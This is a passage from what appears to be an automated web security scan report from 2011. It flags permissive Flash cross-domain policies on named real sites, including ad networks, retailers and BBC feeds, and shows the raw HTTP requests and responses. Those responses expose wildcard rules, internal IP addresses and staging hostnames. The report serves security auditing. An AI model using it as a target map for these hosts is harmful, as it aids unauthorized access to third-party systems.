Host: sv.liveclicker.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:59:03 GMT
Server: Apache
Last-Modified: Mon, 04 Jan 2010 21:03:13 GMT
ETag: "111db0-13e-ca84640"
Accept-Ranges: bytes
Content-Length: 318
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" secure="false" />
...[SNIP]...

6.50. http://tags.mediaforge.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.mediaforge.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.mediaforge.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Date: Mon, 16 May 2011 01:53:12 GMT
P3P: policyref="/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
Server: nginx/0.8.53
Set-Cookie: uID=CqpSnE3Qg4hGhAOdC2IDAg==; expires=Tue, 15-May-12 01:53:12 GMT; domain=.mediaforge.com; path=/
Content-Length: 269
Connection: Close

<cross-domain-policy xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><allow-access-from domain="*"/><site-control
...[SNIP]...

6.51. http://uat.netmng.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://uat.netmng.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: uat.netmng.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:38 GMT
Server: Apache/2.2.9
Last-Modified: Fri, 07 May 2010 14:42:29 GMT
ETag: "6c1d1-6a-4860211879f40"
Accept-Ranges: bytes
Content-Length: 106
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.52. http://wasc.homedepot.ca/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://wasc.homedepot.ca
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: wasc.homedepot.ca

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:11 GMT
Server: Omniture DC/2.0.0
xserver: www8
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.53. http://www.mapquestapi.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mapquestapi.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mapquestapi.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"276-1302871693000"
Last-Modified: Fri, 15 Apr 2011 12:48:13 GMT
Content-Type: application/xml
Content-Length: 276
Date: Mon, 16 May 2011 01:53:40 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" /
...[SNIP]...
<allow-access-from domain="*" secure="true"/>
...[SNIP]...

6.54. http://www26.orientaltrading.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www26.orientaltrading.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www26.orientaltrading.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:11 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "29b86a-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=915
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.55. http://ace.imageg.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ace.imageg.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ace.imageg.net

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 14 Oct 2010 08:47:00 GMT
ETag: "4e411c-2ba-4928fc0d4e900"
X-UA-Compatible: IE=EmulateIE7
Content-Type: application/xml
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 10:47:27 GMT
Date: Mon, 16 May 2011 10:47:27 GMT
Content-Length: 698
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.acehardware.com" />

...[SNIP]...
<allow-access-from domain="*.gspt.net" />
<allow-access-from domain="*.gsipartners.com" />
<allow-access-from domain="preview.gsipartners.com" />
<allow-access-from domain="172.20.1.195" />
<allow-access-from domain="172.21.1.195" />
<allow-access-from domain="206.16.220.195" />
<allow-access-from domain="63.240.110.195" />
<allow-access-from domain="*.fetchback.com"/>
...[SNIP]...

6.56. http://ads.adbrite.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.adbrite.com

Response

HTTP/1.0 200 OK
Accept-Ranges: none
Content-Type: text/x-cross-domain-policy
Date: Mon, 16 May 2011 01:55:16 GMT
Server: XPEHb/1.0
Content-Length: 398
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!-- AdBrite crossdomain.xml for BritePic and BriteFlic -->
<cross-domain-policy>
<allow-access-from domain="*.adbrite.com" secure="true" />
<allow-access-from domain="www.adbrite.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.britepic.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.britepic.com" secure="true" />
...[SNIP]...

6.57. http://ads.al.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.al.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.al.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:02:59 GMT
Server: Apache/2.0.63 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Tue, 20 Jul 2010 15:58:07 GMT
ETag: "2013b-284-c045c1c0"
Accept-Ranges: bytes
Content-Length: 644
Keep-Alive: timeout=2
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_mc-pbt-qspe=ffffffff090d165f45525d5f4f58455e445a4a423660;expires=Mon, 16-May-2011 02:12:59 GMT;path=/;httponly

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*.adinterax.com"/>
<allow-access-from domain="*.vidavee.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="*.theplatform.com"/>
<allow-access-from domain="*.edgesuite.net"/>
<allow-access-from domain="*.edgecast.net"/>
<allow-access-from domain="*.advance.net"/>
<allow-access-from domain="*.tremormedia.com"/>
<allow-access-from domain="*.adserver.adtechus.com"/>
<allow-access-from domain="*.adserver.adtech.de"/>
...[SNIP]...

6.58. http://feeds.bbci.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=109
Expires: Mon, 16 May 2011 10:42:55 GMT
Date: Mon, 16 May 2011 10:41:06 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

6.59. http://gnc.imageg.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://gnc.imageg.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: gnc.imageg.net

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 14 Oct 2010 08:47:00 GMT
ETag: "6781c1-195-4928fc0d4e900"
X-UA-Compatible: IE=EmulateIE7
Content-Type: application/xml
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 01:57:42 GMT
Date: Mon, 16 May 2011 01:57:42 GMT
Content-Length: 405
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="gnc.com" />
<allow-acce
...[SNIP]...
<allow-access-from domain="*.gspt.net" />
<allow-access-from domain="*.gsipartners.com" />
<allow-access-from domain="*.fetchback.com"/>
...[SNIP]...

6.60. http://googleads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sun, 15 May 2011 10:45:15 GMT
Expires: Mon, 16 May 2011 10:45:15 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 54640
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.61. http://images.scanalert.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://images.scanalert.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: images.scanalert.com

Response

HTTP/1.0 200 OK
Server: McAfeeSecure
ETag: "EKdW2Rg2Poz"
Last-Modified: Wed, 03 Sep 2008 18:43:59 GMT
Accept-Ranges: bytes
Content-Type: text/xml; charset=utf-8
Content-Length: 116
Date: Mon, 16 May 2011 02:06:37 GMT
Connection: close
Cache-Control: private

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.scanalert.com"/>
</cross-domain-policy>

6.62. http://images3.pacsun.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: images3.pacsun.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"25343-1305036218000"
Last-Modified: Tue, 10 May 2011 14:03:38 GMT
Content-Type: application/xml
Content-Length: 25343
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:23 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.laneventure.com"/>
<allow-access-from domain="*.pearsonco.com"/>
<allow-access-from domain="*.targetimg1.com"/>
<allow-access-from domain="*.targetimg2.com"/>
<allow-access-from domain="*.targetimg3.com"/>
<allow-access-from domain="*.agilent.com"/>
<allow-access-from domain="*.artvan.com"/>
<allow-access-from domain="*.mizunogolf.com"/>
<allow-access-from domain="*.talbots.com"/>
<allow-access-from domain="giftadvisor.indelible.tv"/>
<allow-access-from domain="*.taaz.com"/>
<allow-access-from domain="www.flashmaxx.com"/>
<allow-access-from domain="flashmaxx.com"/>
<allow-access-from domain="searsfb.indelible.tv"/>
<allow-access-from domain="*.armstrong.com"/>
<allow-access-from domain="ag2010.stage.ascedia.com"/>
<allow-access-from domain="sassomedia.com"/>
<allow-access-from domain="*.photoshop.com"/>
<allow-access-from domain="kijones.host.adobe.com"/>
<allow-access-from domain="ag2010.stage.ascedia.com"/>
<allow-access-from domain="*.trex.com"/>
<allow-access-from domain="*.trexco.com"/>
<allow-access-from domain="*.vermontcountrystore.com"/>
<allow-access-from domain="*.pabng.com"/>
<allow-access-from domain="s7sps3.scene7.com"/>
<allow-access-from domain="*.morrowsnowboards.com"/>
<allow-access-from domain="*.k2admin.com"/>
<allow-access-from domain="*.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.shopdeluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.nimblefish.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.fossil.com"/>
<allow-access-from domain="www.michele.com"/>
<allow-access-from domain="127.0.0.1" secure="true"/>
...[SNIP]...
<allow-access-from domain="www.polarisindustries.com"/>
<allow-access-from domain="backstage.polarisindustries.com"/>
<allow-access-from domain="s7diod-isorigin.scene7.com"/>
<allow-access-from domain="origin-na1.scene7.com"/>
<allow-access-from domain="origin-na2.scene7.com"/>
<allow-access-from domain="origin-na3.scene7.com"/>
<allow-access-from domain="origin-na4.scene7.com"/>
<allow-access-from domain="origin-na5.scene7.com"/>
<allow-access-from domain="origin-na6.scene7.com"/>
<allow-access-from domain="origin-na7.scene7.com"/>
<allow-access-from domain="origin-na8.scene7.com"/>
<allow-access-from domain="s7d1.scene7.com"/>
<allow-access-from domain="s7d2.scene7.com"/>
<allow-access-from domain="s7d3.scene7.com"/>
<allow-access-from domain="s7d4.scene7.com"/>
<allow-access-from domain="s7ondemand1.scene7.com"/>
<allow-access-from domain="irtex1.scene7.com"/>
<allow-access-from domain="10.80.1.144"/>
<allow-access-from domain="10.80.1.152"/>
<allow-access-from domain="10.80.1.42"/>
<allow-access-from domain="origin-apps.scene7.com"/>
<allow-access-from domain="s7ondemand1-apps.scene7.com"/>
<allow-access-from domain="isstaging.scene7.com"/>
<allow-access-from domain="techservices.scene7.com"/>
<allow-access-from domain="ecomtest1.hancockms.com"/>
<allow-access-from domain="www.hancockfabrics.com"/>
<allow-access-from domain="www.eddiebauer.com"/>
<allow-access-from domain="dev.eddiebauer.com"/>
<allow-access-from domain="qa.eddiebauer.com"/>
<allow-access-from domain="testvipd1.scene7.com"/>
<allow-access-from domain="testvipd2.scene7.com"/>
<allow-access-from domain="testvipd3.scene7.com"/>
<allow-access-from domain="testvipd4.scene7.com"/>
<allow-access-from domain="s7ondemand3.scene7.com"/>
<allow-access-from domain="s7ondemand7.scene7.com"/>
<allow-access-from domain="s7ips1.scene7.com"/>
<allow-access-from domain="s7ondemand5.scene7.com"/>
<allow-access-from domain="*.sample.scene7.com"/>
<allow-access-from domain="origin-search.scene7.com"/>
<allow-access-from domain="staging.scene7.com"/>
<allow-access-from domain="s7testis.adobe.com"/>
<allow-access-from domain="sportstown.crosscomm.net"/>
<allow-access-from domain="sportstown.com"/>
<allow-access-from domain="*.sportstown.com"/>
<allow-access-from domain="www.anthropologie.com"/>
<allow-access-from domain="staging.anthropologie.us"/>
<allow-access-from domain="smartwool.dev.summitprojects.com"/>
<allow-access-from domain="smartwool.stage.summitprojects.com"/>
<allow-access-from domain="www.smartwool.com"/>
<allow-access-from domain="s7d5.scene7.com"/>
<allow-access-from domain="testvipd5.scene7.com"/>
<allow-access-from domain="www.roadrunnersports.com"/>
<allow-access-from domain="dev.atgnow.com"/>
<allow-access-from domain="staging.roadrunnersports.com"/>
<allow-access-from domain="*.sportstown.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="sportstown.com" secure="true"/>
...[SNIP]...
<allow-access-from domain=" s7.sears.com "/>
<allow-access-from domain="*.myctmh.com"/>
<allow-access-from domain="*.burton.com"/>
<allow-access-from domain="*.instrum3nt.com"/>
<allow-access-from domain="*.tommybahama.com"/>
<allow-access-from domain="demo.ml.nurun.com"/>
<allow-access-from domain="trek07.hansondodge.com"/>
<allow-access-from domain="*.dexdealer.com" />
<allow-access-from domain="*.bontrager.com" />
<allow-access-from domain="*.trekbikes.com" />
<allow-access-from domain="*.readyfortheroadahead.com" />
<allow-access-from domain="*.belk.com"/>
<allow-access-from domain="*.sears.com"/>
<allow-access-from domain="*.dayport.com"/>
<allow-access-from domain="eaqa2prod1234.ethanallen.com"/>
<allow-access-from domain="devaws.ethanallen.com"/>
<allow-access-from domain="elm.kharv.com"/>
<allow-access-from domain="serotoninsoftware.com"/>
<allow-access-from domain="*.ethanallen.com"/>
<allow-access-from domain="*.wishbook.com"/>
<allow-access-from domain="*.entriq.net"/>
<allow-access-from domain="test-web1-www.lbiatlanta.com"/>
<allow-access-from domain="*.newellco.com"/>
<allow-access-from domain="preview.graco.com"/>
<allow-access-from domain="*.gracobaby.com"/>
<allow-access-from domain="s.sears.com"/>
<allow-access-from domain="202.44.56.2"/>
<allow-access-from domain="202.44.58.2"/>
<allow-access-from domain="beta.graco.com"/>
<allow-access-from domain="*.burton.com"/>
<allow-access-from domain="*.ashleyfurniture.com" />
<allow-access-from domain="*.ashleyfurniturehomestore.com" />
<allow-access-from domain="s7sps1-staging.scene7.com" />
<allow-access-from domain="s7sps1.scene7.com" />
<allow-access-from domain="*.lokion.com"/>
<allow-access-from domain="*.vikingrange.com"/>
<allow-access-from domain="www.armstrong.com"/>
<allow-access-from domain="*.classscene.com"/>
<allow-access-from domain="*.classsceneqa.com"/>
<allow-access-from domain="*.classscenedemo.com"/>
<allow-access-from domain="*.fulltiltboots.com"/>
<allow-access-from domain="*.ridesnowboards.com"/>
<allow-access-from domain="*.karhuskico.com"/>
<allow-access-from domain="*.k2women.com"/>
<allow-access-from domain="*.k2snowboarding.com"/>
<allow-access-from domain="*.k2skis.com"/>
<allow-access-from domain="*.ridesnowboards.com"/>
<allow-access-from domain="*.lineskis.com"/>
<allow-access-from domain="*.5150snowboarding.com"/>
<allow-access-from domain="*.morrowsnowboards.com"/>
<allow-access-from domain="*.atlassnowshoe.com"/>
<allow-access-from domain="*.tubbssnowshoes.com"/>
<allow-access-from domain="*.k2telemark.com"/>
<allow-access-from domain="*.k2dealertools.com"/>
<allow-access-from domain="*.planet-earth-clothing.com"/>
<allow-access-from domain="*.k2skates.com"/>
<allow-access-from domain="*.k2iceskates.com"/>
<allow-access-from domain="*.snowshoes.com"/>
<allow-access-from domain="*.vashonstorefront.com"/>
<allow-access-from domain="*.adiofootwear.com"/>
<allow-access-from domain="*.adio.com"/>
<allow-access-from domain="4.59.112.138"/>
<allow-access-from domain="store.americangirl.com"/>
<allow-access-from domain="*.store.americangirl.com"/>
<allow-access-from domain="agpmt-prod:7778"/>
<allow-access-from domain="agpmt-test:7777"/>
<allow-access-from domain="s7demo.host.adobe.com"/>
<allow-access-from domain="*.jcpenney.com"/>
<allow-access-from domain="*.teamzonesports.com"/>
<allow-access-from domain="*.underarmour.com"/>
<allow-access-from domain="broadridge.mominc.com"/>
<allow-access-from domain="*.craftsman.com"/>
<allow-access-from domain="*.sothebys.com"/>
<allow-access-from domain="*.facebook.com"/>
<allow-access-from domain="*.thuzi.com"/>
<allow-access-from domain="*.samsclub.com"/>
<allow-access-from domain="161.169.79.10"/>
<allow-access-from domain="store.americangirl.com"/>
<allow-access-from domain="*.hansondodge.com"/>
<allow-access-from domain="*.thebrick.com"/>
<allow-access-from domain="s7demo.scene7.com"/>
<allow-access-from domain="*.richrelevance.com"/>
<allow-access-from domain="*.hit.homedepot.resource.com"/>
<allow-access-from domain="*.allurent.net"/>
<allow-access-from domain="*.ashro.com"/>
<allow-access-from domain="*.countrydoor.com"/>
<allow-access-from domain="*.ginnys.com"/>
<allow-access-from domain="*.grandpointe.com"/>
<allow-access-from domain="*.monroeandmain.com"/>
<allow-access-from domain="*.midnightvelvet.com"/>
<allow-access-from domain="*.raceteamgear.com"/>
<allow-access-from domain="*.swisscolony.com"/>
<allow-access-from domain="*.seventhavenue.com"/>
<allow-access-from domain="*.homevisions.com"/>
<allow-access-from domain="*.wards.com"/>
<allow-access-from domain="*.tenderfilet.com"/>
<allow-access-from domain="assets.k2sports.com"/>
<allow-access-from domain="assets.ridesnowboards.com"/>
<allow-access-from domain="assets1.k2sports.com"/>
<allow-access-from domain="assets1.ridesnowboards.com"/>
<allow-access-from domain="assets2.k2sports.com"/>
<allow-access-from domain="assets2.ridesnowboards.com"/>
<allow-access-from domain="161.211.2.28"/>
<allow-access-from domain="161.211.155.7"/>
<allow-access-from domain="ah-stg.fry.com"/>
<allow-access-from domain="cd-stg.fry.com"/>
<allow-access-from domain="gn-stg.fry.com"/>
<allow-access-from domain="gp-stg.fry.com"/>
<allow-access-from domain="hv-stg.fry.com"/>
<allow-access-from domain="mm-stg.fry.com"/>
<allow-access-from domain="mv-stg.fry.com"/>
<allow-access-from domain="mw-stg.fry.com"/>
<allow-access-from domain="rt-stg.fry.com"/>
<allow-access-from domain="rc-stg.fry.com"/>
<allow-access-from domain="tf-stg.fry.com"/>
<allow-access-from domain="sc-stg.fry.com"/>
<allow-access-from domain="sa-stg.fry.com"/>
<allow-access-from domain="shopdeluxe-v9-dev.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="shopdeluxe-v9-uat.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="stage.coach.com"/>
<allow-access-from domain="*.coach.com"/>
<allow-access-from domain="demandware.edgesuite.net"/>
<allow-access-from domain="*.buildabear.com"/>
<allow-access-from domain="*.babwtest.com"/>
<allow-access-from domain="customshop.mesfire.com"/>
<allow-access-from domain="stage.homeinspiration.homedepot.com "/>
<allow-access-from domain="homeinspiration.homedepot.com"/>
<allow-access-from domain="pointroll.com"/>
<allow-access-from domain="*.pointroll.com"/>
<allow-access-from domain="*.smartwool.com"/>
<allow-access-from domain="*.summitprojects.com"/>
<allow-access-from domain="*.nike.com"/>
<allow-access-from domain="511.niteviewtech.com"/>
<allow-access-from domain="www.lauramercier.com"/>
<allow-access-from domain="*.lumberliquidators.com"/>
<allow-access-from domain="*.ae.com"/>
<allow-access-from domain="*.aezone.com"/>
<allow-access-from domain="s7everest.macromedia.com"/>
<allow-access-from domain="s7fuji.macromedia.com"/>
<allow-access-from domain="s7qa-is.macromedia.com"/>
<allow-access-from domain="officemax.companychecksandforms.com"/>
<allow-access-from domain="www.511deasbf.com"/>
<allow-access-from domain="*.511deasbf.com"/>
<allow-access-from domain="*.vcfcorp.com"/>
...[SNIP]...
